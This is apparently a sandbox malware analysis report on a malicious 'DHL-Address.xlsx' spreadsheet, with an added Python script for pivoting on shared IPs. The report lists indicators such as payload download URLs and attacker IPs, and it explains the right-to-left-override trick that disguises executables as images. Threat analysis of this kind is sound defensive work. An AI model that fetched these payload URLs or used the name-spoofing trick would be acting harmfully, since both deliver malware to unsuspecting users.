http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.oces.certifikat.dk/oces.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.certicamara.com/dpc/0Z | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | | high
http://crl.pki.wellsfargo.com/wsprca.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | | high
http://www.dnie.es/dpc0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.rootca.or.kr/rca/cps.html0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.trustcenter.de/guidelines0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://certificates.starfieldtech.com/repository/1604 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | | high
http://smtp.privateemail.com | vbc.exe, 00000005.00000002.2360554779.0000000002658000.00000004.00000001.sdmp | false | | high
http://www.entrust.net/CRL/Client1.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmp | false | | high
http://www.disig.sk/ca0f | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.sk.ee/juur/crl/0 | vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.chambersign.org/chambersignroot.crl0 | vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.xrampsecurity.com/XGCA.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.quovadis.bm0 | vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.ssc.lt/root-a/cacrl.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.firmaprofesional.com0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
https://www.netlock.net/docs | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://crl.entrust.net/2048ca.crl0 | vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp | false | | high
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | | high
http://cps.chambersign.org/cps/publicnotaryroot.html0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.e-trust.be/CPS/QNcerts | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.certicamara.com/certicamaraca.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | | high
http://fedir.comsign.co.il/crl/ComSignCA.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://ocsp.sectigo.com0 | vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://ocsp.entrust.net03 | vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://cps.chambersign.org/cps/chambersroot.html0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.acabogacia.org0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://MLrjrg.com | vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://ca.sia.it/seccli/repository/CPS0 | vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://crl.securetrust.com/STCA.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0 | vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmp | false | URL Reputation: safe |
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.certicamara.com/certicamaraca.crl0;vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.e-szigno.hu/RootCA.crt0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.quovadisglobal.com/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.valicert.com/1vbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.e-szigno.hu/SZSZ/0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                          high
                                          https://api.ipify.org%GETMozilla/5.0vbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          http://www.%s.comPAvbc.exe, 00000005.00000002.2362156931.0000000005BD0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          low
                                          http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://ocsp.quovadisoffshore.com0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://ocsp.entrust.net0Dvbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://cps.chambersign.org/cps/chambersignroot.html0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://DynDns.comDynDNSvbc.exe, 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://sectigo.com/CPS0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.entrust.net/server1.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.ancert.com/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://ca.sia.it/seccli/repository/CRL.der0Jvbc.exe, 00000005.00000002.2361765131.0000000005158000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://rca.e-szigno.hu/ocsp0-vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              high
                                              https://www.netlock.hu/docs/vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.a-cert.at/certificate-policy.html0;vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.crc.bg0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://crl.chambersign.org/publicnotaryroot.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.a-cert.at/certificate-policy.html0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0vbc.exe, 00000005.00000002.2362947679.0000000006A53000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.wellsfargo.com/certpolicy0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://secure.comodo.com/CPS0vbc.exe, 00000005.00000002.2361638883.00000000050A0000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.comsign.co.il/cps0vbc.exe, 00000005.00000002.2362912346.0000000006A20000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown

                                                      Contacted IPs


                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.193.7.228 | unknown | United States | 22612 | NAMECHEAP-NETUS | false
192.210.214.178 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                                                      General Information

                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                      Analysis ID:339078
                                                      Start date:13.01.2021
                                                      Start time:13:16:03
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 0s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:DHL-Address.xlsx
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:6
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/10@5/2
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                      • Quality average: 47.3%
                                                      • Quality standard deviation: 33.5%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .xlsx
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer
                                                      Warnings:
                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 67.26.137.254, 8.248.145.254, 67.26.73.254, 8.248.115.254, 8.253.204.120, 205.185.216.42, 205.185.216.10, 93.184.221.240
                                                      • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

Time | Type | Description
13:17:04 | API Interceptor | 91x Sleep call for process: EQNEDT32.EXE modified
13:17:08 | API Interceptor | 885x Sleep call for process: vbc.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

Match | Associated Sample Name / URL | Detection (context listed beneath the row where available)
199.193.7.228 | shipping-document.xlsx | malicious
199.193.7.228 | iVUeQOg6LO.exe | malicious
199.193.7.228 | SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exe | malicious
199.193.7.228 | DHL-document.xlsx | malicious
199.193.7.228 | wCRnCAMZ3yT8BQ2.exe | malicious
199.193.7.228 | Mj1eX5GWJxDRnuk.exe | malicious
199.193.7.228 | SecuriteInfo.com.Trojan.Inject4.6535.8815.exe | malicious
199.193.7.228 | shipping document.xlsx | malicious
199.193.7.228 | SecuriteInfo.com.Trojan.Inject4.6512.28917.exe | malicious
199.193.7.228 | p72kooG5ak.exe | malicious
199.193.7.228 | additional items.xlsx | malicious
199.193.7.228 | swift copy 1f354972.exe | malicious
199.193.7.228 | DB_DHL_AWB_00117980920AD.exe | malicious
199.193.7.228 | Payment Advice - Advice Ref[G20376302776].pptx.exe | malicious
199.193.7.228 | Payment Reminder & SOA 202020121158.exe | malicious
199.193.7.228 | kg.exe | malicious
199.193.7.228 | logo.exe | malicious
199.193.7.228 | Pictures.exe | malicious
199.193.7.228 | 7iZX0KCH4C.exe | malicious
199.193.7.228 | Al-Hbb_Doc-EUR_Pdf.exe | malicious
192.210.214.178 | shipping-document.xlsx | malicious
• globuserinessserverfiletransferprotocol.mangospot.net/vnc/vbc.exe
192.210.214.178 | DHL-document.xlsx | malicious
• globuserinessserverfiletransferprotocol.mangospot.net/vnc/vbc.exe
192.210.214.178 | shipping document.xlsx | malicious
• 192.210.214.178/reg/vbc.exe

                                                                                              Domains

Match | Associated Sample Name / URL | Detection (context listed beneath each row)
smtp.privateemail.com | shipping-document.xlsx | malicious
• 199.193.7.228
smtp.privateemail.com | iVUeQOg6LO.exe | malicious
• 199.193.7.228
smtp.privateemail.com | SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exe | malicious
• 199.193.7.228
smtp.privateemail.com | DHL-document.xlsx | malicious
• 199.193.7.228
smtp.privateemail.com | wCRnCAMZ3yT8BQ2.exe | malicious
• 199.193.7.228
smtp.privateemail.com | Mj1eX5GWJxDRnuk.exe | malicious
• 199.193.7.228
smtp.privateemail.com | SecuriteInfo.com.Trojan.Inject4.6535.8815.exe | malicious
• 199.193.7.228
smtp.privateemail.com | shipping document.xlsx | malicious
• 199.193.7.228
smtp.privateemail.com | SecuriteInfo.com.Trojan.Inject4.6512.28917.exe | malicious
• 199.193.7.228
smtp.privateemail.com | p72kooG5ak.exe | malicious
• 199.193.7.228
smtp.privateemail.com | additional items.xlsx | malicious
• 199.193.7.228
smtp.privateemail.com | swift copy 1f354972.exe | malicious
• 199.193.7.228
smtp.privateemail.com | DB_DHL_AWB_00117980920AD.exe | malicious
• 199.193.7.228
smtp.privateemail.com | Payment Advice - Advice Ref[G20376302776].pptx.exe | malicious
• 199.193.7.228
smtp.privateemail.com | Payment Reminder & SOA 202020121158.exe | malicious
• 199.193.7.228
smtp.privateemail.com | kg.exe | malicious
• 199.193.7.228
smtp.privateemail.com | logo.exe | malicious
• 199.193.7.228
smtp.privateemail.com | Pictures.exe | malicious
• 199.193.7.228
smtp.privateemail.com | PO48905232020.exe | malicious
• 199.193.7.228
smtp.privateemail.com | 7iZX0KCH4C.exe | malicious
• 199.193.7.228

                                                                                              ASN

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              NAMECHEAP-NETUSNew FedEx paper work review.exeGet hashmaliciousBrowse
                                                                                              • 198.54.122.60
                                                                                              PO-000202112.exeGet hashmaliciousBrowse
                                                                                              • 63.250.34.114
                                                                                              urgent specification request.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.210
                                                                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.210
                                                                                              shipping-document.xlsxGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              Project review_Pdf.exeGet hashmaliciousBrowse
                                                                                              • 198.54.117.215
                                                                                              iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                                                              • 199.193.7.228
                                                                                              mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                                                                                              • 162.255.118.194
Related sample | Verdict | Contacted IP
SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exe | malicious | 199.193.7.228
Purchase Order -263.exe | malicious | 162.0.232.59
Duty checklist and PTP letter.exe | malicious | 162.255.119.136
zz4osC4FRa.exe | malicious | 162.0.238.245
0XrD9TsGUr.exe | malicious | 198.54.117.216
DHL-document.xlsx | malicious | 199.193.7.228
RFQ 41680.xlsx | malicious | 198.54.117.211
Invoice.exe | malicious | 162.213.255.55
wCRnCAMZ3yT8BQ2.exe | malicious | 199.193.7.228
INV2680371456-20210111889374.xlsm | malicious | 68.65.122.35
INV8073565781-20210111319595.xlsm | malicious | 198.54.125.162
al9LrOC8eM.exe | malicious | 162.213.253.37

AS-COLOCROSSINGUS

Related sample | Verdict | Contacted IP
shipping-document.xlsx | malicious | 192.210.214.178
1gEpBw4A95.exe | malicious | 107.172.188.113
IMG_73344332#U00e2#U20ac#U00aegpj.exe | malicious | 192.210.138.60
DHL-document.xlsx | malicious | 192.210.214.178
ORDER#9403.exe | malicious | 198.12.76.78
shipping document.xlsx | malicious | 192.210.214.178
DHL-ADDRESS.xlsx | malicious | 192.210.214.177
home.css.ps1 | malicious | 107.175.49.49
DHL ADDRESS.xlsx | malicious | 192.210.214.177
PolicyUpdate.htm | malicious | 107.172.191.160
202101041.htm | malicious | 104.168.28.144
IMG_84755643#U00e2#U20ac#U00aegpj.exe | malicious | 192.210.138.60
202101041.htm | malicious | 104.168.28.144
eeFX76545672.htmL | malicious | 23.94.5.133
PO-JQ1125742021.xlsx | malicious | 198.12.125.25
TTR payment amount 131,000 USD.xlsx | malicious | 216.170.114.70
KBC Enquiry No.20201228.xlsx | malicious | 216.170.114.70
BANK SWIFT.xlsx | malicious | 216.170.114.70
Payment_details.exe | malicious | 198.12.76.78
SWIFT COPY AMOUNT OF US 49.676,30 FOR SMX022-10-20 DATED 23122020.xlsx | malicious | 198.23.207.5

Note on the two IMG_ names: "#U00e2#U20ac#U00ae" is the report's escaping of the UTF-8 bytes E2 80 AE, i.e. a right-to-left override character (U+202E). A file manager renders everything after it reversed, so a name ending in "...gpj.exe" displays as "...exe.jpg" while the real extension stays .exe.
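Two pivots an analyst would run on the context table above, as an added example that is not part of the sandbox report: group the related samples by contacted IP to find infrastructure shared across campaigns, and decode the report's "#Uxxxx" escapes to find names carrying a right-to-left override. The rows are copied from the table; the escape convention (one escape per code point, non-ASCII bytes shown as their cp1252 reading of UTF-8) is inferred from the two IMG_ names, not documented by the report.

```python
"""Pivot on the 'related samples' context of a sandbox report."""
import re
from collections import defaultdict

# Constructed from the rows on this page (sample name, contacted IP).
# Every row there carries the verdict 'malicious'.
RELATED = [
    ("SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exe", "199.193.7.228"),
    ("Purchase Order -263.exe", "162.0.232.59"),
    ("Duty checklist and PTP letter.exe", "162.255.119.136"),
    ("zz4osC4FRa.exe", "162.0.238.245"),
    ("0XrD9TsGUr.exe", "198.54.117.216"),
    ("DHL-document.xlsx", "199.193.7.228"),
    ("RFQ 41680.xlsx", "198.54.117.211"),
    ("Invoice.exe", "162.213.255.55"),
    ("wCRnCAMZ3yT8BQ2.exe", "199.193.7.228"),
    ("INV2680371456-20210111889374.xlsm", "68.65.122.35"),
    ("INV8073565781-20210111319595.xlsm", "198.54.125.162"),
    ("al9LrOC8eM.exe", "162.213.253.37"),
    ("shipping-document.xlsx", "192.210.214.178"),
    ("1gEpBw4A95.exe", "107.172.188.113"),
    ("IMG_73344332#U00e2#U20ac#U00aegpj.exe", "192.210.138.60"),
    ("DHL-document.xlsx", "192.210.214.178"),
    ("ORDER#9403.exe", "198.12.76.78"),
    ("shipping document.xlsx", "192.210.214.178"),
    ("DHL-ADDRESS.xlsx", "192.210.214.177"),
    ("home.css.ps1", "107.175.49.49"),
    ("DHL ADDRESS.xlsx", "192.210.214.177"),
    ("PolicyUpdate.htm", "107.172.191.160"),
    ("202101041.htm", "104.168.28.144"),
    ("IMG_84755643#U00e2#U20ac#U00aegpj.exe", "192.210.138.60"),
    ("202101041.htm", "104.168.28.144"),
    ("eeFX76545672.htmL", "23.94.5.133"),
    ("PO-JQ1125742021.xlsx", "198.12.125.25"),
    ("TTR payment amount 131,000 USD.xlsx", "216.170.114.70"),
    ("KBC Enquiry No.20201228.xlsx", "216.170.114.70"),
    ("BANK SWIFT.xlsx", "216.170.114.70"),
    ("Payment_details.exe", "198.12.76.78"),
    ("SWIFT COPY AMOUNT OF US 49.676,30 FOR SMX022-10-20 DATED 23122020.xlsx", "198.23.207.5"),
]

# 'ORDER#9403.exe' has a literal '#', so require 'U' plus exactly four hex digits.
_ESC = re.compile(r"#U([0-9a-fA-F]{4})")
RTLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE


def decode_name(name):
    """Undo '#Uxxxx' escapes (inferred convention, see lead-in): each escape is
    one code point; non-ASCII ones are the cp1252 reading of UTF-8 bytes, so
    re-encode as cp1252 and decode as UTF-8 to recover the real character."""
    text = _ESC.sub(lambda m: chr(int(m.group(1), 16)), name)
    try:
        return text.encode("cp1252").decode("utf-8")
    except UnicodeError:
        return text  # not the expected double-encoding; keep what we have


def displayed_name(name):
    """What a file manager shows for a name with one RLO: the text after the
    override is drawn reversed, so '...\u202egpj.exe' reads '...exe.jpg'."""
    real = decode_name(name)
    if RTLO not in real:
        return real
    head, _, tail = real.partition(RTLO)
    return head + tail[::-1]


def shared_infrastructure(rows, min_samples=2):
    """IPs contacted by at least `min_samples` distinct sample names,
    most-shared first (ties broken by IP string)."""
    by_ip = defaultdict(set)
    for name, ip in rows:
        by_ip[ip].add(decode_name(name))
    shared = {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= min_samples}
    return dict(sorted(shared.items(), key=lambda kv: (-len(kv[1]), kv[0])))


def rtlo_samples(rows):
    """Sample names whose decoded form contains a right-to-left override."""
    return [name for name, _ in rows if RTLO in decode_name(name)]


if __name__ == "__main__":
    for ip, names in shared_infrastructure(RELATED).items():
        print(f"{ip}: {len(names)} samples -> {names}")
    for n in rtlo_samples(RELATED):
        print("RLO name", repr(decode_name(n)), "renders as", displayed_name(n))
```

Three IPs (192.210.214.178, 199.193.7.228, 216.170.114.70) are each contacted by three distinct samples; 104.168.28.144 appears twice but under the same name, so it is counted once. Grouping by distinct name rather than by row is a deliberate choice: repeated submissions of one file should not inflate the sharing count.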

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                              Category:dropped
                                                                                              Size (bytes):58936
                                                                                              Entropy (8bit):7.994797855729196
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):326
                                                                                              Entropy (8bit):3.1132326309774547
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKmLZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:eLWkPlE99SNxAhUegeT2
                                                                                              MD5:1F8086C4F7DE9AC50C354544138EFB63
                                                                                              SHA1:DF1CE6541A5C69D8733233F74788499C244C345C
                                                                                              SHA-256:D38B35A19ECD3018DF239EC1F944BC797B1FC5F9F81BD0EB3BD10CCD30E1637D
                                                                                              SHA-512:110F038BDB200C93D09A7391CD6BD6F8F25A4CF916FD3AAE3E87302B33F58DFBBC82670129A2FA0BA76CA16615F161B41C9678B5A95C533B9F22E99C52501AB3
                                                                                              Malicious:false
                                                                                              Reputation:low
